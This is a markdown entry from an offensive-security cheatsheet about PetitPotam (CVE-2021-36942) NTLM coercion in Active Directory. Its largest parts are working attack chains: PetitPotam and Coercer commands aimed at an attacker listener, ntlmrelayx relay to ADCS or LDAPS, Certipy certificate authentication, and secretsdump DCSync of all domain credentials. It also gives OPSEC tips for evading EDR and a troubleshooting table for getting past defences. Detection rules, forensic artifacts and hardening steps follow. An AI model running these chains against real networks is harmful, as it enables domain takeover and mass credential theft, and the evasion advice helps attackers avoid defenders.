daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-41-petitpotam-cve-2021-36942.md (22717B)


      1 ---
      2 title: "Attack #41 β€” PetitPotam (CVE-2021-36942)"
      3 description: "PetitPotam exploits the Encrypting File System Remote Protocol (MS-EFSR) to coerce a target (typically a DC) to authenticate to an attacker-controlled…"
      4 category: active-directory
      5 subcategory: "Domain Controller Attacks"
      6 tags: ["active-directory", "adcs", "credential-access", "ntlm", "relay"]
      7 tools: ["Impacket", "Certipy", "Responder", "OpenSSL", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Five/πŸ”΅ Attack #41 β€” PetitPotam (CVE-2021-36942).md"
     11 ---
     12 # πŸ”΅ Attack #41 β€” PetitPotam (CVE-2021-36942) β€” NTLM Coercion
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 PetitPotam exploits the **[Encrypting File System Remote Protocol (MS-EFSR)](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/)** to coerce a target (typically a DC) to authenticate to an attacker-controlled host via NTLM. This coerced authentication is then relayed to another service β€” most commonly **ADCS web enrollment (ESC8)** β€” to obtain a certificate for the coerced machine account, enabling DCSync and full domain compromise.
     19 
     20 PetitPotam was initially **exploitable without authentication** on unpatched DCs, making it an unauthenticated domain compromise vector when combined with ESC8.
     21 
     22 > [!info]+ Technical Deep-Dive β€” MS-EFSR RPC Call Flow
     23 > 1. The attacker connects to the target's **MS-EFSR RPC endpoint** β€” accessible via two named pipes: `\pipe\efsrpc` (direct) and `\pipe\lsarpc` (LSASS-hosted)
     24 > 2. The DCERPC interface UUID is `c681d488-d850-11d0-8c52-00c04fd90f7e` (MS-EFSR)
     25 > 3. The attacker calls one of several **EFS RPC functions** (see table below) with a UNC path pointing to the attacker's listener (e.g., `\\ATTACKER_IP\share\file`)
     26 > 4. The target DC attempts to access the specified UNC path, triggering **NTLM authentication** back to the attacker
     27 > 5. The attacker captures this NTLM authentication and **relays it** to a target service (ADCS HTTP enrollment, LDAP, SMB, etc.)
     28 > 6. *The relay target receives the authentication as if it came from the DC machine account β€” enabling certificate enrollment, RBCD configuration, or other privileged operations*
     29 
     30 ### Exploitable EFS RPC Functions
     31 
     32 | OpNum | Function Name | Auth Required (Patched) | Auth Required (Unpatched) |
     33 |---|---|---|---|
     34 | 0 | `EfsRpcOpenFileRaw` | Yes | **No** |
     35 | 4 | `EfsRpcDecryptFileSrv` | Yes | Yes |
     36 | 5 | `EfsRpcQueryUsersOnFile` | Yes | Yes |
     37 | 6 | `EfsRpcQueryRecoveryAgents` | Yes | Yes |
     38 | 12 | `EfsRpcEncryptFileSrv` | Yes | Yes |
     39 | 15 | `EfsRpcAddUsersToFile` | Yes | Yes |
     40 
     41 > [!warning]+ Patch Status and Authentication Requirements
     42 > `fas:TriangleExclamation`
     43 > 1. **Pre-August 2021 patch**: `EfsRpcOpenFileRaw` (OpNum 0) was callable **without authentication** β€” combined with ESC8, this gave unauthenticated domain compromise
     44 > 2. **Post-August 2021 patch**: `EfsRpcOpenFileRaw` requires authentication; other functions always required auth
     45 > 3. **Post-patch, PetitPotam still works with any domain credential** β€” the patch only closed the unauthenticated vector
     46 > 4. *Even on fully patched systems, PetitPotam with any low-priv domain account + ESC8 = full domain compromise*
     47 
     48 ***
     49 
     50 ## βš™οΈ Prerequisites
     51 
     52 | Requirement | Detail |
     53 |---|---|
     54 | **Network access to DC** | MS-EFSR RPC endpoint (port 445 via `\pipe\efsrpc` or `\pipe\lsarpc`) |
     55 | **Credentials (on patched DCs)** | Any valid domain user β€” unauthenticated on unpatched DCs |
     56 | **Relay target** | ADCS web enrollment (ESC8), LDAP (if signing not enforced), SMB (if signing not enforced) |
     57 | **Listener setup** | ntlmrelayx.py, krbrelayx, or Responder to capture/relay the coerced authentication |
     58 
     59 ***
     60 
     61 ## πŸ› οΈ Tools
     62 
     63 | Tool | Platform | Version | Notes |
     64 |---|---|---|---|
     65 | [PetitPotam.py](https://github.com/topotam/PetitPotam) | Linux/Python | Python 3 | Original exploit by topotam β€” MS-EFSR coercion |
     66 | [Coercer](https://github.com/p0dalirius/Coercer) | Linux/Python | β‰₯ 2.0 | Multi-protocol coercion tool β€” includes PetitPotam + many other coercion methods |
     67 | [ntlmrelayx.py](https://github.com/fortra/impacket) | Linux | Impacket β‰₯ 0.10.0 | NTLM relay framework β€” `--adcs` flag for ESC8 relay |
     68 | [krbrelayx](https://github.com/dirkjanm/krbrelayx) | Linux/Python | Latest | Kerberos relay; can relay to LDAP(S) with Kerberos auth |
     69 | [Certipy](https://github.com/ly4k/Certipy) | Linux/Python | β‰₯ 4.0 | Authenticate with obtained certificate β†’ DCSync |
     70 | [Responder](https://github.com/lgandx/Responder) | Linux/Python | β‰₯ 3.0 | Capture NTLM hashes (for cracking instead of relay) |
     71 
     72 ***
     73 
     74 ## ⏱️ Time-to-Execute Estimates
     75 
     76 | Operation | Time | Notes |
     77 |---|---|---|
     78 | PetitPotam coercion | **2–5 seconds** | Single RPC call |
     79 | ntlmrelayx certificate enrollment | **5–15 seconds** | ADCS HTTP enrollment |
     80 | Certipy auth (certificate β†’ TGT) | **3–10 seconds** | PKINIT authentication |
     81 | Full chain (coerce β†’ relay β†’ DCSync) | **30–90 seconds** | End-to-end domain compromise |
     82 
     83 ***
     84 
     85 ## πŸ’» Full Commands
     86 
     87 ### πŸ”΄ PetitPotam Coercion
     88 
     89 ```bash
     90 # ── Unauthenticated (unpatched DCs only β€” pre-Aug 2021) ──────────────────────
     91 python3 PetitPotam.py LISTENER_IP DC01.corp.local
     92 
     93 # ── Authenticated (works on all DCs) ─────────────────────────────────────────
     94 python3 PetitPotam.py -u low_user -p 'Password1' -d corp.local \
     95   LISTENER_IP DC01.corp.local
     96 
     97 # ── With Pass-the-Hash ────────────────────────────────────────────────────────
     98 python3 PetitPotam.py -u low_user -hashes :aabbccdd11223344 -d corp.local \
     99   LISTENER_IP DC01.corp.local
    100 
    101 # ── Specify named pipe (bypass pipe filtering) ────────────────────────────────
    102 python3 PetitPotam.py -u low_user -p 'Password1' -d corp.local \
    103   -pipe lsarpc LISTENER_IP DC01.corp.local
    104 # Try: efsrpc, lsarpc, samr, netlogon, lsass
    105 ```
    106 
    107 ### πŸ”΄ Full Attack Chain β€” PetitPotam + ESC8 (Most Common)
    108 
    109 ```bash
    110 # ── Terminal 1: Start relay to ADCS web enrollment ────────────────────────────
    111 ntlmrelayx.py -t http://CA01.corp.local/certsrv/certfnsh.asp \
    112   -smb2support --adcs --template DomainController
    113 
    114 # ── Terminal 2: Coerce DC to authenticate to our relay ────────────────────────
    115 python3 PetitPotam.py ATTACKER_IP DC01.corp.local
    116 # (or with auth: python3 PetitPotam.py -u user -p pass -d corp.local ATTACKER_IP DC01.corp.local)
    117 
    118 # ── Result: ntlmrelayx captures a certificate for DC01$ ──────────────────────
    119 # Output: "Certificate is saved to DC01.corp.local.b64"
    120 
    121 # ── Terminal 3: Authenticate with the certificate β†’ get TGT β†’ DCSync ─────────
    122 certipy auth -pfx DC01.pfx -dc-ip 10.10.10.10
    123 # Outputs: DC01.ccache (TGT for DC01$ machine account)
    124 
    125 export KRB5CCNAME=DC01.ccache
    126 secretsdump.py -k -no-pass corp.local/'DC01$'@DC01.corp.local -just-dc
    127 # Full domain credential dump via DCSync
    128 ```
    129 
    130 ### πŸ”΄ PetitPotam + LDAPS Relay (RBCD Abuse)
    131 
    132 ```bash
    133 # ── If LDAP signing is NOT enforced and ADCS is not available ─────────────────
    134 
    135 # Terminal 1: Start LDAPS relay with delegate access
    136 ntlmrelayx.py -t ldaps://DC02.corp.local --delegate-access -smb2support
    137 
    138 # Terminal 2: Coerce DC01 to authenticate
    139 python3 PetitPotam.py -u low_user -p 'Password1' -d corp.local \
    140   ATTACKER_IP DC01.corp.local
    141 
    142 # Result: ntlmrelayx creates a machine account and configures RBCD
    143 # Output: "Delegation rights modified β€” YOURPC$ can delegate to DC01$"
    144 
    145 # Terminal 3: S4U2Self + S4U2Proxy to impersonate Administrator
    146 getST.py -spn cifs/DC01.corp.local -impersonate Administrator \
    147   -dc-ip 10.10.10.10 corp.local/'YOURPC$':'RandomPassword'
    148 
    149 export KRB5CCNAME=Administrator@cifs_DC01.corp.local@CORP.LOCAL.ccache
    150 secretsdump.py -k -no-pass corp.local/Administrator@DC01.corp.local
    151 ```
    152 
    153 ### πŸ”΄ Coercer (Multi-Protocol β€” Includes PetitPotam + More)
    154 
    155 ```bash
    156 # ── Scan for all available coercion methods ───────────────────────────────────
    157 coercer scan -u low_user -p 'Password1' -d corp.local \
    158   -t DC01.corp.local
    159 
    160 # ── Coerce via MS-EFSR specifically ──────────────────────────────────────────
    161 coercer coerce -u low_user -p 'Password1' -d corp.local \
    162   -l LISTENER_IP -t DC01.corp.local --filter-protocol-name MS-EFSR
    163 
    164 # ── Coerce via ALL available protocols ────────────────────────────────────────
    165 coercer coerce -u low_user -p 'Password1' -d corp.local \
    166   -l LISTENER_IP -t DC01.corp.local
    167 
    168 # ── Coerce with specific pipe ────────────────────────────────────────────────
    169 coercer coerce -u low_user -p 'Password1' -d corp.local \
    170   -l LISTENER_IP -t DC01.corp.local --filter-pipe-name efsrpc
    171 ```
    172 
    173 ***
    174 
    175 ## 🎯 OPSEC Tips
    176 
    177 1. **PetitPotam coercion itself is relatively quiet** β€” a single EFS RPC call generates minimal logs compared to brute-force attacks
    178 2. **The relay portion is the noisy part** β€” NTLM relay to ADCS generates certificate enrollment events; relay to LDAP generates LDAP modification events
    179 3. **Use `\pipe\lsarpc` instead of `\pipe\efsrpc`** β€” some EDR tools specifically monitor for `efsrpc` pipe access; `lsarpc` is more common and blends with normal traffic
    180 4. **Coercer's scan mode is detectable** β€” it probes multiple RPC endpoints; use targeted coercion (specify protocol) instead of scanning all protocols
    181 5. **Time the attack during business hours** β€” NTLM traffic is normal during working hours; off-hours coercion stands out in traffic analysis
    182 6. **Clean up RBCD delegations** if using the LDAPS relay path β€” leftover `msDS-AllowedToActOnBehalfOfOtherIdentity` entries are forensic artifacts
    183 
    184 ### πŸ“Š OpSec Ranking
    185 
    186 | Method | Stealth | Speed | Reliability | Notes |
    187 |---|---|---|---|---|
    188 | PetitPotam + ESC8 (unauth) | 🟒 High | 🟒 Fast | 🟒 High | Single RPC call + HTTP relay; minimal footprint |
    189 | PetitPotam + ESC8 (auth) | 🟒 High | 🟒 Fast | 🟒 High | Same as above with auth; still very clean |
    190 | PetitPotam + LDAPS relay | 🟑 Medium | 🟑 Medium | 🟑 Medium | Creates machine account + RBCD entry (artifacts) |
    191 | Coercer scan (all protocols) | πŸ”΄ Low | 🟑 Medium | 🟒 High | Probes many RPC endpoints β€” noisy |
    192 | Coercer targeted (MS-EFSR only) | 🟒 High | 🟒 Fast | 🟒 High | Same as PetitPotam with better CLI |
    193 
    194 ***
    195 
    196 ## πŸ›‘οΈ Detection β€” Event IDs
    197 
    198 | Event ID | Source | What to Look For |
    199 |---|---|---|
    200 | **4624** | Security Log (DC) | NTLM authentication from DC machine account to unexpected host (the relay target) |
    201 | **5145** | Security Log | Network share access β€” `\pipe\efsrpc` or `\pipe\lsarpc` pipe access from non-admin |
    202 | **4768** | Security Log (CA) | TGT request using certificate authentication (PKINIT) β€” post-relay indicator |
    203 | **4886/4887** | CA Event Log | Certificate request received/approved for a DC machine account template |
    204 | **4625** | Security Log | Failed NTLM authentication attempts (if relay fails) |
    205 
    206 ### πŸ”Ž Sigma Rules
    207 
    208 ```yaml
    209 # ── SigmaHQ β€” PetitPotam NTLM Coercion via MS-EFSR ──────────────────────────
    210 title: PetitPotam NTLM Coercion (MS-EFSR Pipe Access)
    211 id: f0d2e6b8-petitpotam-efsr-coercion
    212 status: experimental
    213 logsource:
    214   product: windows
    215   service: security
    216 detection:
    217   selection:
    218     EventID: 5145
    219     ShareName: '\\*\IPC$'
    220     RelativeTargetName|contains:
    221       - 'efsrpc'
    222       - 'lsarpc'
    223   condition: selection
    224 level: high
    225 tags:
    226   - attack.credential_access
    227   - attack.t1187
    228   - cve.2021.36942
    229 ```
    230 
    231 ```yaml
    232 # ── SigmaHQ β€” ADCS Certificate Enrollment for Machine Account ────────────────
    233 title: Suspicious Certificate Enrollment for Machine Account
    234 id: a1b2c3d4-adcs-machine-cert-enrollment
    235 logsource:
    236   product: windows
    237   service: security
    238   provider: 'Microsoft-Windows-CertificateServicesClient-AutoEnroll'
    239 detection:
    240   selection:
    241     EventID:
    242       - 4886
    243       - 4887
    244     SubjectName|contains: '$'
    245     Template|contains: 'DomainController'
    246   condition: selection
    247 level: high
    248 ```
    249 
    250 ### πŸ›‘οΈ EDR-Specific Detections
    251 
    252 > [!warning]+ Microsoft Defender for Identity (MDI)
    253 > 1. **"Suspected NTLM authentication tampering"** β€” detects NTLM relay patterns including PetitPotam-initiated coercion
    254 > 2. **"Suspected NTLM relay attack (Exchange account)"** β€” broader relay detection that also catches PetitPotam chains
    255 > 3. MDI correlates NTLM authentication from DC machine accounts to non-DC targets as suspicious
    256 > 4. *Post-2023 MDI updates include specific PetitPotam coercion detection via MS-EFSR pipe monitoring*
    257 
    258 > [!warning]+ CrowdStrike Falcon
    259 > 1. **"NTLM Coercion Attack Detected"** β€” behavioral detection for MS-EFSR-triggered NTLM authentication to external hosts
    260 > 2. Falcon monitors outbound NTLM from DC machine accounts β€” any auth to a non-DC is flagged
    261 > 3. Process-level detection for PetitPotam.py and Coercer execution on attacker machines within the network
    262 
    263 > [!warning]+ Elastic Security
    264 > 1. Rule: **"Potential NTLM Coercion via MS-EFSR"** β€” monitors for EFS pipe access from unusual sources
    265 > 2. Rule: **"ADCS Certificate Enrollment for Machine Account"** β€” detects relay-to-ADCS chain completion
    266 > 3. Rule: **"Outbound NTLM from Domain Controller"** β€” network-level detection for DC-originated NTLM to non-DCs
    267 
    268 ***
    269 
    270 ## πŸ”¬ Forensic Artifacts
    271 
    272 | Artifact | Location | Details |
    273 |---|---|---|
    274 | **Named pipe access** | Event 5145 / Sysmon 17/18 | `\pipe\efsrpc` or `\pipe\lsarpc` access from attacker IP |
    275 | **NTLM auth from DC** | Event 4624 on relay target | DC machine account authenticating to unexpected service (ADCS, LDAP) |
    276 | **Certificate enrollment** | CA Event Log (4886/4887) | Certificate issued to DC machine account via web enrollment |
    277 | **RBCD entry** | AD object `msDS-AllowedToActOnBehalfOfOtherIdentity` | If LDAPS relay was used β€” check this attribute on compromised accounts |
    278 | **Machine account creation** | Event 4741 | If LDAPS relay created a new machine account for RBCD |
    279 | **Network capture** | PCAP | MS-EFSR RPC call β†’ NTLM auth β†’ relay to ADCS/LDAP; identifiable by DCERPC UUID and UNC paths |
    280 
    281 ***
    282 
    283 > [!important]+ Windows Server Version & Patch Differences
    284 > 1. **Pre-August 2021**: `EfsRpcOpenFileRaw` callable without authentication β€” **unauthenticated domain compromise** when paired with ESC8
    285 > 2. **August 2021 patch**: Closes unauthenticated vector for `EfsRpcOpenFileRaw`; other functions still require only low-priv auth
    286 > 3. **Server 2016**: Vulnerable; patch available
    287 > 4. **Server 2019**: Vulnerable; patch available
    288 > 5. **Server 2022**: Shipped patched for unauth; authenticated coercion still works unless EPA is enforced on ADCS
    289 > 6. **Server 2025**: EPA enabled by default on IIS/ADCS HTTP endpoints β€” blocks the ESC8 relay path out of the box; LDAPS relay may still work if LDAP channel binding is not enforced
    290 > 7. *The definitive mitigation is enforcing Extended Protection for Authentication (EPA) on ADCS web enrollment + enforcing LDAP channel binding β€” NOT just patching PetitPotam*
    291 
    292 ***
    293 
    294 ## πŸ”’ Hardening & Prevention
    295 
    296 ```powershell
    297 # ── 1. Enable EPA on ADCS Web Enrollment (blocks ESC8 relay) ─────────────────
    298 # On the CA server running Certificate Authority Web Enrollment:
    299 # IIS Manager β†’ Sites β†’ Default Web Site β†’ certsrv β†’
    300 # Authentication β†’ Windows Authentication β†’ Advanced Settings β†’
    301 # Extended Protection: Required
    302 # Token Checking: Allow
    303 
    304 # Or via appcmd:
    305 appcmd.exe set config "Default Web Site/certsrv" `
    306   /section:windowsAuthentication /extendedProtection.tokenChecking:Require
    307 
    308 # ── 2. Enforce LDAP signing (blocks LDAP relay) ──────────────────────────────
    309 # GPO β†’ Computer Configuration β†’ Windows Settings β†’ Security Settings β†’
    310 # Local Policies β†’ Security Options β†’
    311 # "Domain controller: LDAP server signing requirements" = "Require signing"
    312 
    313 # Registry on DCs:
    314 Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters" `
    315   -Name "LDAPServerIntegrity" -Value 2 -Type DWord
    316 
    317 # ── 3. Enforce LDAP channel binding (blocks LDAPS relay) ─────────────────────
    318 Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters" `
    319   -Name "LdapEnforceChannelBinding" -Value 2 -Type DWord
    320 # Value 2 = Always enforce channel binding
    321 
    322 # ── 4. Disable NTLM where possible ───────────────────────────────────────────
    323 # GPO β†’ Computer Configuration β†’ Windows Settings β†’ Security Settings β†’
    324 # Local Policies β†’ Security Options β†’
    325 # "Network security: Restrict NTLM: NTLM authentication in this domain" = "Deny all"
    326 # ⚠️ Test thoroughly β€” many legacy apps depend on NTLM
    327 
    328 # ── 5. Disable unnecessary EFS RPC service ────────────────────────────────────
    329 # If EFS is not used, consider disabling access to the EFS pipe:
    330 # However, there is no clean way to disable MS-EFSR without breaking EFS functionality
    331 # Best approach: patch + EPA + LDAP signing
    332 
    333 # ── 6. Block outbound NTLM from Domain Controllers ───────────────────────────
    334 # Windows Firewall rule to prevent DCs from authenticating to workstation IPs:
    335 New-NetFirewallRule -DisplayName "Block DC Outbound SMB/NTLM" `
    336   -Direction Outbound -Protocol TCP -RemotePort 445 `
    337   -RemoteAddress "10.10.10.0/24" -Action Block `
    338   -Profile Domain
    339 # ⚠️ Exclude other DC IPs and trusted servers
    340 
    341 # ── 7. Remove the ADCS HTTP enrollment endpoint entirely ─────────────────────
    342 # If web enrollment is not needed, disable it:
    343 # Server Manager β†’ Remove Roles β†’ Remove "Certificate Authority Web Enrollment"
    344 # This completely eliminates the ESC8 attack surface
    345 
    346 # ── 8. Apply August 2021 patch ────────────────────────────────────────────────
    347 # KB5005565 (Server 2019), KB5005573 (Server 2016)
    348 # Closes the unauthenticated vector β€” but authenticated PetitPotam still works
    349 ```
    350 
    351 ***
    352 
    353 ## 🧩 Troubleshooting
    354 
    355 | Error | Cause | Fix |
    356 |---|---|---|
    357 | PetitPotam returns `STATUS_ACCESS_DENIED` | DC is patched; unauthenticated access blocked | Add `-u user -p pass -d domain` for authenticated coercion |
    358 | `Connection refused` on pipe | MS-EFSR pipe is filtered or firewalled | Try alternative pipes: `-pipe lsarpc`, `-pipe samr`, `-pipe netlogon` |
    359 | ntlmrelayx shows `Authenticating against ldaps://... failed` | LDAP channel binding is enforced | Switch relay target to ADCS HTTP enrollment (ESC8) instead of LDAP |
    360 | Certificate enrollment fails with `Access Denied` | Template doesn't allow machine account enrollment | Use `--template DomainController` or `--template Machine`; verify template permissions with `certipy find` |
    361 | Coercion works but no auth received on listener | Target DC can't reach attacker IP (firewall) | Verify bidirectional connectivity on port 445; attacker IP must be routable from the DC |
    362 | `Certipy auth` fails with `KDC_ERR_PADATA_TYPE_NOSUPP` | DC doesn't support PKINIT or certificate is invalid | Verify PKINIT is enabled on the DC; check the certificate with `openssl x509 -in cert.pem -text` |
    363 | Relay to ADCS succeeds but cert is for wrong account | ntlmrelayx template mismatch | Specify `--template DomainController` to ensure the cert is issued for the DC machine account |
    364 | `Coercer scan` shows no vulnerable methods | All protocols patched or filtered | Try targeted coercion with specific protocols; some newer MS-EFSR functions may still work |
    365 
    366 ***
    367 
    368 ## πŸ—ΊοΈ MITRE ATT&CK
    369 
    370 | Tactic | Technique ID | Sub-technique | Procedure | APT Groups |
    371 |---|---|---|---|---|
    372 | **Credential Access** | [T1187](https://attack.mitre.org/techniques/T1187/) | Forced Authentication | Coerce DC NTLM authentication via MS-EFSR RPC calls | Used in ransomware campaigns, red team operations |
    373 | **Credential Access** | [T1557](https://attack.mitre.org/techniques/T1557/) | [.001 β€” LLMNR/NBT-NS Poisoning or MDNS](https://attack.mitre.org/techniques/T1557/001/) | Relay coerced NTLM authentication to ADCS, LDAP, or SMB targets | Chained technique |
    374 | **Privilege Escalation** | [T1068](https://attack.mitre.org/techniques/T1068/) | Exploitation for Privilege Escalation | Chain PetitPotam + ESC8 for domain escalation from any domain user | Multiple ransomware groups |
    375 
    376 > [!tip]+ Real-World Usage
    377 > `fas:Lightbulb`
    378 > 1. **PetitPotam + ESC8** is one of the most commonly exploited attack chains in modern AD pentests β€” nearly every environment with ADCS web enrollment enabled is vulnerable
    379 > 2. **LockBit, BlackCat/ALPHV** ransomware groups have incorporated PetitPotam into their automated domain compromise playbooks
    380 > 3. **CISA Alert AA21-209A** specifically warns about PetitPotam exploitation in the wild
    381 > 4. *The combination of PetitPotam (coercion) + ESC8 (relay) represents the most impactful AD attack chain discovered since Zerologon*
    382 
    383 ***
    384 
    385 ## πŸ”— Attack Chain Context
    386 
    387 ```
    388 [PetitPotam] ──→ NTLM Coercion β†’ Relay β†’ Domain Compromise
    389          β”‚
    390          β”œβ”€β”€β†’ πŸ”— PetitPotam + ESC8 = most common ADCS attack chain (Attack #33)
    391          β”œβ”€β”€β†’ πŸ”— Also chains with: LDAP relay β†’ RBCD, Unconstrained Delegation (Attack #15)
    392          β”œβ”€β”€β†’ πŸ”— Related: PrinterBug (Attack #42) β€” MS-RPRN coercion (similar concept)
    393          β”œβ”€β”€β†’ πŸ”— Related: NTLM Relay (Attack #7) β€” relay framework
    394          β”œβ”€β”€β†’ πŸ’₯ Unauthenticated on unpatched DCs (pre-Aug 2021 patches)
    395          β”œβ”€β”€β†’ πŸ”— Coercer tool combines PetitPotam with DFSCoerce, PrinterBug, and more
    396          └──→ πŸ’€ Defeated by: patch, enable EPA on ADCS, enforce LDAP signing/channel binding, disable NTLM
    397 ```
    398 
    399 ***
    400 
    401 > βœ… **Attack #41 β€” PetitPotam complete.**